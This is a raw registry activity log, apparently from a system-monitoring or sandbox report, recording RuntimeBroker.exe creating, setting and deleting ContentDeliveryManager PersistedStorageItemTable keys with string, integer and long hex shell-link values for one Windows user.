Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7cf61dd6-6721-4cf6 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13bad0a6-5d99-40d1 = 315e8c85cbafda01 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\21a7bd0f-7b66-4650 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\166550b1-a4c9-4866 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5c012c11-5e92-4607 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\84dd4413-414f-4ffb = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7cf61dd6-6721-4cf6 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\84dd4413-414f-4ffb = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\84dd4413-414f-4ffb = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000faec994acbafda01faec994acbafda01faec994acbafda01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000bb5836022000653630336332343333633535633639646132383961336330636136636631383161613534313135396162343266646539663261393738633337393364333233610000b20009000400efbebb583602bb5836022e000000000000000000000000000000000000000000000000000697da00650036003000330063003200340033003300630035003500630036003900640061003200380039006100330063003000630061003600630066003100380031006100610035003400310031003500390061006200340032006600640065003900660032006100390037003800630033003700390033006400330032003300610000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000344b7c191000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c65363033633234333363353563363964613238396133633063613663663138316161353431313539616234326664653966326139373863333739336433323361000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000067796c71776a636e00000000000000005efd912f2a58f84f87a07e819e0464db87d251ed3d0def11b8c062c35996caed5efd912f2a58f84f87a07e819e0464db87d251ed3d0def11b8c062c35996caedd2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003100380031003700360037003200300034002d0032003000300039003300300036003900310038002d0033003700310038003700360039003400300034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000b7d72a8a000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\7cf61dd6-6721-4cf6 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13bad0a6-5d99-40d1 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000ea488485cbafda01ea488485cbafda01ea488485cbafda01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000bb586b022000646233653261306466616364396334336537363336666564626462343665363566393061376532393064346534306661393766323863653832653335663664640000b20009000400efbebb586b02bb586b022e0000000000000000000000000000000000000000000000000016d85900640062003300650032006100300064006600610063006400390063003400330065003700360033003600660065006400620064006200340036006500360035006600390030006100370065003200390030006400340065003400300066006100390037006600320038006300650038003200650033003500660036006400640000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000344b7c191000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c64623365326130646661636439633433653736333666656462646234366536356639306137653239306434653430666139376632386365383265333566366464000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000067796c71776a636e00000000000000005efd912f2a58f84f87a07e819e0464db9dd251ed3d0def11b8c062c35996caed5efd912f2a58f84f87a07e819e0464db9dd251ed3d0def11b8c062c35996caedd2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003100380031003700360037003200300034002d0032003000300039003300300036003900310038002d0033003700310038003700360039003400300034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000b7d72a8a000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\166550b1-a4c9-4866 = 377c9885cbafda01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\166550b1-a4c9-4866 = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000078979285cbafda0178979285cbafda0178979285cbafda01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000bb586b022000376564313135353665303736316236653037363462646233396130373766636439666261616136336361343665303762383062356635666161346435393563340000b20009000400efbebb586b02bb586b022e0000000000000000000000000000000000000000000000000088894b00370065006400310031003500350036006500300037003600310062003600650030003700360034006200640062003300390061003000370037006600630064003900660062006100610061003600330063006100340036006500300037006200380030006200350066003500660061006100340064003500390035006300340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000344b7c191000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37656431313535366530373631623665303736346264623339613037376663643966626161613633636134366530376238306235663566616134643539356334000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000067796c71776a636e00000000000000005efd912f2a58f84f87a07e819e0464db9fd251ed3d0def11b8c062c35996caed5efd912f2a58f84f87a07e819e0464db9fd251ed3d0def11b8c062c35996caedd2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003100380031003700360037003200300034002d0032003000300039003300300036003900310038002d0033003700310038003700360039003400300034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000b7d72a8a000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3062e17d-9b6c-40fa = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13bad0a6-5d99-40d1 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3062e17d-9b6c-40fa = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dd61e9c9-f157-4550 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\84dd4413-414f-4ffb C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0272d800-5cb4-4c09 = "0" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f57b5531-891f-45c4 = bf1a6586cbafda01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0272d800-5cb4-4c09 = c11c7186cbafda01 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0272d800-5cb4-4c09 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000f344e185cbafda01b22c4a86cbafda01b22c4a86cbafda010abf09000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000bb586b022000353865663164653536643264636136326134333063346262363833333232653039383235643232613964393361343238326332316537636139383037656564630000b20009000400efbebb586b02bb586b022e0000000000000000000000000000000000000000000000000054c54600350038006500660031006400650035003600640032006400630061003600320061003400330030006300340062006200360038003300330032003200650030003900380032003500640032003200610039006400390033006100340032003800320063003200310065003700630061003900380030003700650065006400630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000344b7c191000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c35386566316465353664326463613632613433306334626236383333323265303938323564323261396439336134323832633231653763613938303765656463000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000067796c71776a636e00000000000000005efd912f2a58f84f87a07e819e0464dba5d251ed3d0def11b8c062c35996caed5efd912f2a58f84f87a07e819e0464dba5d251ed3d0def11b8c062c35996caedd2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003100380031003700360037003200300034002d0032003000300039003300300036003900310038002d0033003700310038003700360039003400300034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000b7d72a8a000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\21a7bd0f-7b66-4650 C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\13bad0a6-5d99-40d1 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\0272d800-5cb4-4c09 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3062e17d-9b6c-40fa = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000ac5b9785cbafda01ac5b9785cbafda01ac5b9785cbafda01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000bb586b022000353865663164653536643264636136326134333063346262363833333232653039383235643232613964393361343238326332316537636139383037656564630000b20009000400efbebb586b02bb586b022e0000000000000000000000000000000000000000000000000054c54600350038006500660031006400650035003600640032006400630061003600320061003400330030006300340062006200360038003300330032003200650030003900380032003500640032003200610039006400390033006100340032003800320063003200310065003700630061003900380030003700650065006400630000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000344b7c191000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c35386566316465353664326463613632613433306334626236383333323265303938323564323261396439336134323832633231653763613938303765656463000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000067796c71776a636e00000000000000005efd912f2a58f84f87a07e819e0464dba0d251ed3d0def11b8c062c35996caed5efd912f2a58f84f87a07e819e0464dba0d251ed3d0def11b8c062c35996caedd2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003100380031003700360037003200300034002d0032003000300039003300300036003900310038002d0033003700310038003700360039003400300034002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000b7d72a8a000000000000d01200000000000000000000000000000000 C:\Windows\System32\RuntimeBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dd61e9c9-f157-4550 = "8324" C:\Windows\System32\RuntimeBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3062e17d-9b6c-40fa C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f57b5531-891f-45c4 C:\Windows\System32\RuntimeBroker.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\3062e17d-9b6c-40fa C:\Windows\System32\RuntimeBroker.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable C:\Windows\System32\RuntimeBroker.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\21a7bd0f-7b66-4650 = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000080349085cbafda0180349085cbafda0180349085cbafda01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000bb586b022000366332653934636136653565313632336632366236656430393433663566643364613764356161343437303330303366353164656366386133373734393761620000b20009000400efbebb586b02bb586b022e0000000000000000000000000000000000000000000000000080ec4d00360063003200650039003400630061003600650035006500310036003200330066003200360062003600650064003000390034003300660035006600640033006400610037006400350061006100340034003700300033003000300033006600350031006400650063006600380061003300370037003400390037006100620000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f0